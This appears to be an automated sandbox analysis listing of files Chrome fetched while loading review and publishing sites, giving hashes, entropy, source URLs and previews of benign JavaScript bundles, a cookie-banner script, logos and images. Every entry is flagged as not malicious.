                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2888],{49623:function(e,t,r){var n={"./de/messages":[18877,8877],"./en/messages":[20973,973],"./es/messages":[53497,3497],"./fr/messages":[70727,727],"./it/messages":[86713,6713],"./ja/messages":[68817,8817],"./nl/messages":[47089,7089],"./pt/messages":[44601,4601],"./zu/messages":[68892,8892]};function i(e){if(!r.o(n,e))return Promise.resolve().then(function(){var t=Error("Cannot find module '"+e+"'");throw t.code="MODULE_NOT_FOUND",t});var t=n[e],i=t[0];return r.e(t[1]).then(function(){return r(i)})}i.keys=function(){return Object.keys(n)},i.id=49623,e.exports=i},7321:function(e,t,r){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.authErrorMessages=t.NoUserPoolError=t.AuthError=void 0;let n=r(3446),i=r(67915),o=new n.ConsoleLogger("AuthError");class a extends Error{constructor(e){let{message:r,log:n}=t.authErrorMessages[e];super(r),this.constructor=a,Object.setPrototypeOf(this,a.prototype),this.name="AuthError",
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1451
                                                                                                                                                                                                        Entropy (8bit):7.521426404049779
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:+cKYj6LVzSdRjL8WrBODKWO/39iktaxsJB1N71AF/F7EvDjWWfckf+VHhVwuA:+cKYjwVGddrwbO/tikSsJDNR0wvDjP2I
                                                                                                                                                                                                        MD5:C49F6114F46A3012CB64DF377A6EB5A7
                                                                                                                                                                                                        SHA1:CACBC14BBCF2A1B3F5609D8A49EBE03C3E84ADE1
                                                                                                                                                                                                        SHA-256:2395A11235326636ACCC4B2F664C8FF739D8DBF23C75B4FB5AB5A2E540689C6A
                                                                                                                                                                                                        SHA-512:3A180DED0805653B62D88606A76DFCD36D6832BB20BA7B549166B070BDD9439659F0C4C3CF6A1E3E12D196F09AD0E9CAD4C9F84E8B960F8B24B98ABF1831143A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/d5bb525e-43fd-44ad-b018-e69dbd4d4817.jpeg?auto=format%2Ccompress&fit=max&w=128&q=75&ch=Width%2CDPR
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma...................mdat........`...B2.......1@...8wts\\|0.>..>f.$8P.P-..z..G.....X.b.;?..vnDV...r.L.pou....4.R..9.;S....M{''...-0)..n....hq.e..+D.[f6tK"..2.Zp...E.].x.C..e.......b.N....U0h.0.I../`|/.._wS.G.P.=.......d.....N..9....?.qA+.pd&.kJH...<.B..y.y. ......7.;O>.c./bE.P.._...{WA.5...?...b.<#.h.....o..8.o.u<O.............@..... a...+.....r.$...I/.W......C...(..>...K..|...`.....)........d...'.8`.`z-.D./....;5.....5..Dm.r.I.T..I2..G........o.&....E....|...;.0JF.B..=x..W|...c./..D.Z..68d..|..%di....X....3.f.7.;.*.z.,....(.......496G..O{....W&.1hjm.........]...Qt.............+....1....k.5.e,../L.(.H7=W.....:..a...D.t66....wk....B8....Xs(.;6.|...3.t..z)..`.!...<6....V._.w.....P^G....&t.-.]...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3474
                                                                                                                                                                                                        Entropy (8bit):4.6754679836176125
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:Tvfc+6q8nQdBVvSl5CFbpbgLQqXRSwwTROSxdXZdDe:Dc+v8nQdbbpbiQERGROSPXZZe
                                                                                                                                                                                                        MD5:207813698A7A383DF704D68BBF035618
                                                                                                                                                                                                        SHA1:2E69A23FFEF22D7ACFD6D53AE7BB9BED8F03CC26
                                                                                                                                                                                                        SHA-256:67DE20A8953784456920A543B49EB2E9284CABF47138081D79DF540F1DEF1668
                                                                                                                                                                                                        SHA-512:D77D7AC183BAEA7010F0D0CB61FC95E8D27A8D8F5FF0DA33EA8BD38AC9758BDEA15768CED1E93871ECDF7BD67CDFC9AEB271672F5CD826DDDFA30D34238C0BAD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/groupon.svg
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 23.0.4, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 1960.6 308.8" style="enable-background:new 0 0 1960.6 308.8;" xml:space="preserve">.<style type="text/css">...st0{fill:#53A318;}.</style>.<g>..<path class="st0" d="M976.2,307.6c66.2,0,110.3-42.9,110.3-115.3V7.1h-72.4v182.3c0,33.7-12.1,50.4-37.5,50.4...c-24.5,0-35-17.1-35-50.4V7.1h-72.8v185.2C868.9,266.3,909.2,307.6,976.2,307.6z"/>..<path class="st0" d="M1280.5,23.3c-20-14.1-43.7-16.2-74.9-16.2h-98.2V303h72.4v-95.3h20.8c30.8,0,54.1-2.1,72.9-13.3...c29.5-17.9,47-49.5,47-87.8C1320.5,69.5,1306.8,41.6,1280.5,23.3z M1194,143.6h-13.3V73.3h19.1c32.1,0,47.5,10,47.5,34.5...C1247.2,134.4,1229.8,143.6,1194,143.6z"/>..<polygon class="st0" points="1720.9,138.2 1831.2,303 1894.8,303 1894.8,7.1 1822.5,7.1 1822.5,171.5 1713.8,7.1 16
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (63529), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):63529
                                                                                                                                                                                                        Entropy (8bit):5.281778375193074
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:A1yEnyxQEWJZDb4aJ0hHUaHFLPrW+p0B3zmE7ceIU1xeAGxM9:sJ1ENL4cFMr9
                                                                                                                                                                                                        MD5:02F09379C544BEFA413D22EB57ED41DE
                                                                                                                                                                                                        SHA1:156FF3FBF28D890EB0F79754E436AC3A66B3DE24
                                                                                                                                                                                                        SHA-256:E555F4B34B579E6528D6BBD4819620A634C0759B41DFA99520B7CA5AA5117B11
                                                                                                                                                                                                        SHA-512:C2252DE8C217909D15CBA15F47631751B69FE56DD167716A5BE05A4104DDFE28332764EBFDCFFF0DF2614DC9187E2C70B199B5EAC49D45F7A6DA7FF2F3E4AB8E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[18],{"0O9J":function(e,t,n){"use strict";var r=n("lEaq"),o=n.n(r),i=n("ERkP"),a=n.n(i),c=n("aWzz"),s=n.n(c),u=n("11Hm"),l=n("I9iR"),p=n.n(l),f=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var n=arguments[t];for(var r in n)Object.prototype.hasOwnProperty.call(n,r)&&(e[r]=n[r])}return e};function _possibleConstructorReturn(e,t){if(!e)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return!t||"object"!==typeof t&&"function"!==typeof t?e:t}var d=function(e){function Router(){var t,n;!function _classCallCheck(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}(this,Router);for(var r=arguments.length,o=Array(r),i=0;i<r;i++)o[i]=arguments[i];return t=n=_possibleConstructorReturn(this,e.call.apply(e,[this].concat(o))),n.state={match:n.computeMatch(n.props.history.location.pathname)},_possibleConstructorReturn(n,t)}return function _inherits(e,t){if("functio
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 500 x 610, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):111731
                                                                                                                                                                                                        Entropy (8bit):7.995359056760109
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:3072:2i5oBznGU0x6SRnPOu08uZlsBnENWVhMut8B:Ynax6muEnmu+
                                                                                                                                                                                                        MD5:D183A96E91FA5F8E9E0962F7FCC16BB5
                                                                                                                                                                                                        SHA1:2460E396A53F43507B557B3295489EDAAC72F28E
                                                                                                                                                                                                        SHA-256:5D8E8CDDBF8CA7DD4F5795E300C55B99048C797A5D88663708827CADA309725C
                                                                                                                                                                                                        SHA-512:2E8FEFC865C72C633843A61A861A2CF8810FB6E259969F6762855EAA88C8DDC50EB8E4EC7E856DCF6FDA9D1A7A247FDE0A5F46DBCF604755A94AD9BE5AEA2083
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/template2-p-500.png
                                                                                                                                                                                                        Preview:.PNG........IHDR.......b........{....PLTE...bab....C..........Liq..................^..c.................p.................k.....g.....Q..R..S..Q..Q..P..P..R..Q..P..Q..P..Q.......R..N.......L..N..R..Q..M....O..R..R..T..O..J....L..V..S..L..N..H..U....Q................N........Y..\..`..Y....v.O..P..S.M..Q..^....e..D..|....h..O....h..T.O.Xr....p.....`n......c..\............V..p...........fi.._.....`..................T.V....R....l.....].................U..X..y.....a..t........l....\...ke.....b..b....~.W....t.g..........z\..l...a....r..{.\..g.s.l..d~.z.R...m..e.o....w..ew.[..[.t.....b.u_......x..v.Z.pc..}.......k...........X..........fm...........Y........Nz..iZ................1.K.....................}..............n... tRNS..................1.J..j...........}....pHYs............... .IDATx..[l......|...m.v.C.FDfd&..P.)..,..A.6.../X.r.)................H.o... H4@...iR ...[...-.eK..>#K...b....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65451)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):457713
                                                                                                                                                                                                        Entropy (8bit):5.359724172933691
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:cIba05axBBnE7qecH+bMxjVUYHXKuYbN0ShGZa3Qaeu+QFs:cRqaxBBnE7qnU1bNp3Q82
                                                                                                                                                                                                        MD5:F46AB853BFF0C58B3D7A4F8EBDB1E0F7
                                                                                                                                                                                                        SHA1:B537C503507697D58FDF4599C0D9DDAC93BEBEFF
                                                                                                                                                                                                        SHA-256:1E4B4FC897B28572139D99A48B119F8B81E71B8B0A262463D798D08176FCBB6F
                                                                                                                                                                                                        SHA-512:9A60DA31655306CF4AA549AF3387B398FA0F298C35AA46495C9BB465B56FCC0BF29EE56300EEC83AA9E6597B02119A8606852CAA06C75588177C0AA436F75BC4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://cdn.cookielaw.org/scripttemplates/202403.2.0/otBannerSdk.js
                                                                                                                                                                                                        Preview:/** . * onetrust-banner-sdk. * v202403.2.0. * by OneTrust LLC. * Copyright 2024 . */.!function(){"use strict";var x=function(e,t){return(x=Object.setPrototypeOf||({__proto__:[]}instanceof Array?function(e,t){e.__proto__=t}:function(e,t){for(var o in t)Object.prototype.hasOwnProperty.call(t,o)&&(e[o]=t[o])}))(e,t)};function D(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Class extends value "+String(t)+" is not a constructor or null");function o(){this.constructor=e}x(e,t),e.prototype=null===t?Object.create(t):(o.prototype=t.prototype,new o)}var H,R=function(){return(R=Object.assign||function(e){for(var t,o=1,n=arguments.length;o<n;o++)for(var r in t=arguments[o])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e}).apply(this,arguments)};function u(e,s,a,l){return new(a=a||Promise)(function(o,t){function n(e){try{i(l.next(e))}catch(e){t(e)}}function r(e){try{i(l.throw(e))}catch(e){t(e)}}function i(e){var t;e.done?o(e.value):((t=e.value)instanceof a?t:new a(fun
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):123763
                                                                                                                                                                                                        Entropy (8bit):5.315349042301051
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:hd5Yw+mj1mL3i831LrO/dlvod0ZmmNOKq5E80av7:h2L3iq0A4Od5uaz
                                                                                                                                                                                                        MD5:C4205CD479AA3760E9EB687999C79064
                                                                                                                                                                                                        SHA1:F305C2033846FA42A8C6716A7089D22331747DF1
                                                                                                                                                                                                        SHA-256:E5794B1CBAA97512645BF6471EEB7533DC53DBF8E2AC1D4649F147129B27A537
                                                                                                                                                                                                        SHA-512:657AA9F1F79E9E50BA01FE68B3C68928D0F7F1B6090759F9D6EB69538DFF187D0128E3AD1D65DE8233ACC7E24BFCB97D7FD415139BC841B2B9992A06F48C70B7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[286],{58291:function(e,t){"use strict";function n(){return""}Object.defineProperty(t,"__esModule",{value:!0}),Object.defineProperty(t,"getDeploymentIdQueryOrEmptyString",{enumerable:!0,get:function(){return n}})},41616:function(){"trimStart"in String.prototype||(String.prototype.trimStart=String.prototype.trimLeft),"trimEnd"in String.prototype||(String.prototype.trimEnd=String.prototype.trimRight),"description"in Symbol.prototype||Object.defineProperty(Symbol.prototype,"description",{configurable:!0,get:function(){var e=/\((.*)\)/.exec(this.toString());return e?e[1]:void 0}}),Array.prototype.flat||(Array.prototype.flat=function(e,t){return t=this.concat.apply([],this),e>1&&t.some(Array.isArray)?t.flat(e-1):t},Array.prototype.flatMap=function(e,t){return this.map(e,t).flat()}),Promise.prototype.finally||(Promise.prototype.finally=function(e){if("function"!=typeof e)return this.then(e,e);var t=this.constructor||Promise;return this.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 32x32, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):909
                                                                                                                                                                                                        Entropy (8bit):7.058210519773923
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:tLpLjEFLjEm9vtDIlkCJyulDirtgEDjz9pzlPUOGvXBUK1DWBhP/npgz9SWGDI:TYzvtD2culD4trjPz5ovXKwqf9dI
                                                                                                                                                                                                        MD5:899496BC58D09B26146537523A2958F1
                                                                                                                                                                                                        SHA1:ABD0A6EACD7132256F2BA5818645BDB45854FB32
                                                                                                                                                                                                        SHA-256:DA6888B31818F4ADF1D5830E84F701280AD50AAAB6AE15AA910D63389B2228DA
                                                                                                                                                                                                        SHA-512:EF40CEFD24D74351A93A862FAD63833BC5408AC6201D2BD076D5D99F9B4AAFDCF24AE44D628EF1E3AFDC6459ADD3A514BF871599CF330E4D7B0AA0ACCE87D0ED
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF.....H.H........................................................#...#*%%*525EE\..................................................#...#*%%*525EE\...... . .."..........-...............................................................+..V9..sy.....Y....*.........................a....!1.3S"#2A.........?..D....W..#.jD....yl+*P..uc.n.@vkK.>#_vD.....p'.H.zh.....Y....w.L@.+j8.G.$..]..ZV7u...bT....3.R|..6...Cy.${`.!I..o~d...%W....w..T....>.9..Uu...\..5.f.H.CR.v..A...M...kjk.(v.$@...D..........l.g.)..$...^.t....G.%.l .c..~.Vi.5."a.Y&......S.'.-..$......whj..Xu......Dd.....H...:..A.S.M.;q.k"CI.r6...?.8.Yk.I6.U..<..(.p.#..?%`d.?.N=?...!.........................!.A2Qa........?..d<{..A..9!y|{....c.3n<EI.....rV.h.....;.$l.V...#.h..kX.t.vvr(....`..._... .........................!.Aq.........?...<.OT.R0.....f 6.=r.f...u`......h....G.k...M..J......0.u.......*.#V.T3Hz..u$....?..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (7024), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):7024
                                                                                                                                                                                                        Entropy (8bit):5.243866195527281
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:PQkUObJXxg1A1ZfGtv7nX39ySwBg9yMIDrcj7roqLUZbcrUmj:oO+EBGtb30IKD4nFt
                                                                                                                                                                                                        MD5:612FFE647B0768F5F33C252707F9C7BC
                                                                                                                                                                                                        SHA1:E556BF22A0337FD5EC8A3F909F18EF9193B36B23
                                                                                                                                                                                                        SHA-256:618F630F6E90C43291762500890AB597B5A4B2426EE3B4B633DDB694CA2CA50D
                                                                                                                                                                                                        SHA-512:BF01FB7A85B611227C6AC8334C01B978D7C6F3C75A27A456B28E2B37089CAFBAFAEB1F8BB1DC889258A95D23A4FE972029C08D396E9FD9445920A8F736E4FE4F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/5327-e463db11805c3313.js
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5327],{24260:function(e,t){let n;Object.defineProperty(t,"__esModule",{value:!0}),function(e,t){for(var n in t)Object.defineProperty(e,n,{enumerable:!0,get:t[n]})}(t,{DOMAttributeNames:function(){return r},default:function(){return o},isEqualNode:function(){return a}});let r={acceptCharset:"accept-charset",className:"class",htmlFor:"for",httpEquiv:"http-equiv",noModule:"noModule"};function l(e){let{type:t,props:n}=e,l=document.createElement(t);for(let e in n){if(!n.hasOwnProperty(e)||"children"===e||"dangerouslySetInnerHTML"===e||void 0===n[e])continue;let a=r[e]||e.toLowerCase();"script"===t&&("async"===a||"defer"===a||"noModule"===a)?l[a]=!!n[e]:l.setAttribute(a,n[e])}let{children:a,dangerouslySetInnerHTML:o}=n;return o?l.innerHTML=o.__html||"":a&&(l.textContent="string"==typeof a?a:Array.isArray(a)?a.join(""):""),l}function a(e,t){if(e instanceof HTMLElement&&t instanceof HTMLElement){let n=t.getAttribute("nonce")
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4333
                                                                                                                                                                                                        Entropy (8bit):7.179140273943784
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+0jjc5N26MT0D5MdtbZPAVwzVHlsxYpUqeLD6:+0/coYNMtKw/0C
                                                                                                                                                                                                        MD5:2D01036E8EE9B7E8B85A464B10F8E48A
                                                                                                                                                                                                        SHA1:43B19145D0BFD45F93E6ADE0DA1D95CC54A509AC
                                                                                                                                                                                                        SHA-256:6172C56F051F5BDD5E13EC012D7F50CC7D892EE9BAF939CAE5D3FDD74A4C181B
                                                                                                                                                                                                        SHA-512:A769377939DE3A7225956666C6C7F6063221FCE4AEC30C476FE16609CD4F44B0FFBF9C5D02A809B5009D65A0EBE5103D424991D66A647901D138AC3733AF378E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/713f882b-f7a1-4f3f-a484-7af2fe13f5c3.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o...~...(iinf..........infe........av01Color.....iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2744)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):232092
                                                                                                                                                                                                        Entropy (8bit):5.552351682422893
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:Hy0QRLxI5i2A415QyqVho8HMTm8/kCtAXNe1x:HwvA5Qyqccyh/kCtAXIx
                                                                                                                                                                                                        MD5:1F7519F0721A347A4C724B05CB3C69FC
                                                                                                                                                                                                        SHA1:994B3EE1416F859D7A5BA57B2631D1628CDD8DD9
                                                                                                                                                                                                        SHA-256:CE01B8266AE07CB53192A72C9B9AF6CF4C211DDD880AC88FA1943296CAA9E81E
                                                                                                                                                                                                        SHA-512:2A753BDF11834E5217D9E63D0039B77B3FA5889C9E7CC0D098885B9FFF3EAC2099034D2003363761B935281F1E4B8D12175E402AD8EC3848BFBF1557984C9183
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:"use strict";this.default_gsi=this.default_gsi||{};(function(_){var window=this;.try{._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a||[]};(0,_._F_toggles_initialize)([0x1220000, 0x601, ]);.var aa,ba,ca,da,t,ea,fa,ha,ja;aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};da=ca(this);t=function(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writabl
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):6391
                                                                                                                                                                                                        Entropy (8bit):4.451055422231384
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:zvfUCL/YeF//9fGDGpcGRfuCZtkPZ3BoaSoeX+XVC+4taZ2FlTSTOS5ROS0c:jUCkeF9SGpc+GitkPZ3yaSTX+0+ySNjf
                                                                                                                                                                                                        MD5:C40719CE20E0E42810B148093800381B
                                                                                                                                                                                                        SHA1:5E30A1016FDB627A94D88E7C9D2A895AAB3012D2
                                                                                                                                                                                                        SHA-256:DAC67355D5A76833F50C5B48FA6667ECB06FD7A394F370669562E5AFB73E49ED
                                                                                                                                                                                                        SHA-512:3E26A41009C3C33BB342183417DBAC6A0A24394A98390F6FA883D740CF9C04D29DF837C82FB9A8A91AABE47B12DFFD200EF3287B78287401AF83C9C4CA1FE4B3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/microsoft.svg
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 22.1.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 1639 350" style="enable-background:new 0 0 1639 350;" xml:space="preserve">.<style type="text/css">...st0{fill:#F25022;}...st1{fill:#FEFEFE;}...st2{fill:#80BA01;}...st3{fill:#777777;}...st4{fill:#02A4EF;}...st5{fill:#FFB902;}.</style>.<g>..<path class="st0" d="M0,0h166.5c0,55.5,0,111,0,166.5c-55.5,0-111,0-166.5,0V0L0,0z"/>..<path class="st1" d="M166.5,0h17c0,55.5,0,111,0,166.5c55.5,0,111,0,166.5,0c0-55.5,0-111,0-166.5h1289v129.5...c-11.9,0-23.8-0.1-35.6,0.1c-0.3-15,0-30.1-0.1-45.1c-11.9,3.6-23.7,7.4-35.6,10.8c-0.3,11.4,0,22.8-0.2,34.2...c-17.6,0-35.1,0-52.7,0c0.2-9-0.6-18,0.7-27c1.1-7,5.2-14.1,12-16.8c8.7-3.5,18.3-1.2,26.5,2.4c-0.1-10.3,0.1-20.6-0.1-30.9...c-17.3-4.8-37.1-3.8-52.5,6.2c-9.9,6.3-17.1,16.5-20.3,27.7c-3
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 1452 x 1284, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):717659
                                                                                                                                                                                                        Entropy (8bit):7.981418078994665
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:O2CxoWNk9zmdjygD+DPK8ikifjanEbknEPuO4vVQd1jZpR+:9pWNndyg67KjfOnWnuOxd5ZpR+
                                                                                                                                                                                                        MD5:512B7392F69641099ED82D088C042C1C
                                                                                                                                                                                                        SHA1:EC5B6AE073E3228E60E09F5EA32DDBD9A918583D
                                                                                                                                                                                                        SHA-256:B812EC7F63E86AA3454F6EB0F3744CE0A3A6BE1DBE4F483CC2B72380F16A4E59
                                                                                                                                                                                                        SHA-512:38FF5682B271FF7117ED09D48D3B9CE828CC359A229D2DC9FD893A23EF4623D5F1150F32224C38B1F1243571188FAE53D128E377EBC015A777014688539D279F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/home_banner.png
                                                                                                                                                                                                        Preview:.PNG........IHDR.............0.W.....gAMA......a....8eXIfMM.*.......i............................................ .....@.IDATx.....%y].......RY{U..U.U...Mwu...9"..n.A...{.y3...q.{s.9GqF.eu}.sAYTFv.Eiph..^.^.k..o.%..~.fdFF.7..q.7 *".._?Q.u....e..@....@....@..d.X..>.G.......R....@ ..|...C.K. .... ...........g...I. w..i....hG....Q....@....@...:....N.(..... ..+Y.E...Z...b.XdE....@....@.......-6.!.@...b..!.....-.>8...f.. .... .....C..3..L.. .o......=...I.>H..cg.. .... .....D../z.J.. .C...1|(t....C.......... .... ......{.A......A..u...}@.......P=N..... .... .@...^.o.4..... p...D..@ ..|.L.s... .... .....I..#..4.....I..u...}A..D..A3...N#.... .... 0......;.".@...\'..e......8....... .... ...q.H...I.s....?..%...p..<..K.. ......V)8A....@....@................]..{`8.....:..@.3.>.u.Gi..@....@....Y n./.?......I..[.8n.I.... 0..|......@....@.....@ ..+....R...b$...q....GBW.@..p.>........ .... ..(.....A.=...#0J.......Qz.....,....?<..... .... .@....=B...U.=`.J..h".@o/.l2...A...o.A.........
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (16573), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):16573
                                                                                                                                                                                                        Entropy (8bit):5.426372856777445
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:8285PtCyvxq0zgdxM7CyPyq0p0WK/+Cy8q0ibCyD1Jq0MpEwFuCpEPi8nmXavu7w:8BxB8+yBvyXBSzBgEZCeuIpXnivyief
                                                                                                                                                                                                        MD5:4397292C526CD1316C3C2A1E390D6C5F
                                                                                                                                                                                                        SHA1:08C844AAB1173233C3EB271F0614017A4BFF9BFA
                                                                                                                                                                                                        SHA-256:D08C4967134AC87F1D7682864B8B678E38AA4F9D5669A31708892BC1DD046BFC
                                                                                                                                                                                                        SHA-512:5215D7AFF8A8042A65F1429C07A84D13F9FC7FC192B75AEECEE0A9B10396E23840383A0CFF714086353549407191E00578495F0357D18ACDA65E65520BBEC9E8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
